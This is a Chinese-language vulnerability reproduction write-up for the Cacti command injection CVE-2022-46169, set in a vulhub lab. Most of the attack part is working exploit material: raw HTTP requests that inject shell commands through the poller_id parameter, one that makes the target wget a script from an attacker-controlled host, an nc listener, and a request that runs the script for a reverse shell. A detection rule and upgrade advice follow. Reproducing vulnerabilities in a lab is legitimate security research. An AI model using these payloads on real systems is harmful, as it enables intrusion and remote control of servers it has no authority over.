Cacti命令执行漏洞（CVE-2022-46169）-0h

漏洞概述

Cacti是一套基于PHP，Mysql，SNMP及RRDTool开发的网络流量监控图形分析工具
在本漏洞中，攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id，以及构造local_data_ids参数，满足poller_item=POLLER_ACTION_SCRIPT_PHP条件，触发proc_open()函数，从而导致命令执行。

影响版本

Cacti == 1.2.22

利用条件

Cacti应用中至少存在一个类似是POLLER_ACTION_SCRIPT_PHP的采集器

环境部署

使用vulhub直接拉取环境

cd vulhub-master/cacti/CVE-2022-46169/
docker-compose up -d 
docker-compose ps 

环境启动后，访问靶机的8080端口会跳转到登录页面，创建一个用户名与密码，然后根据页面的提示进行初始化，不断点击“下一步”，直至安装完成即可。


登录Cacti后台首页创建一个新的Graph

创建的Graph Type是“Device – Uptime”

点击创建

漏洞复现

burp抓取首页包，构造请求payload实现RCE
POC：

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`要执行的命令` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

这里我选择的是将他的用户名反弹到dnslog上

可以看到我们的命令成功执行，当前命令的回显已经反弹到了dnslog上

制作EXP

Python搭建HTTP服务

python3 -m http.server 80

让目标去下载恶意文件

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`wget http://192.168.64.129:8080/exp.sh -O /tmp/exp.sh` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Kali开启监听，执行EXP，拿下shell

nc -lvvp 8888

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=;/remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`/bin/bash+/tmp/exp.sh` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: 192.168.64.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CactiDateTime=Tue Mar 07 2023 09:49:44 GMT+0800 (ä¸­å›½æ ‡å‡†æ—¶é—´); CactiTimeZone=480; Cacti=5f5a478fc065c3a185f8b52bb3980f8b
Upgrade-Insecure-Requests: 1

成功反弹shell

检测POC规则编写

params: []
name: Cacti命令执行漏洞-CVE-2022-46169
set: {}
rules:
- method: GET
  path: /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`whoami`
  headers:
    X-Forwarded-For: 127.0.0.1
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"uptime")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

修复建议

升级到安全版本
下载链接：

https://github.com/Cacti/cacti/tags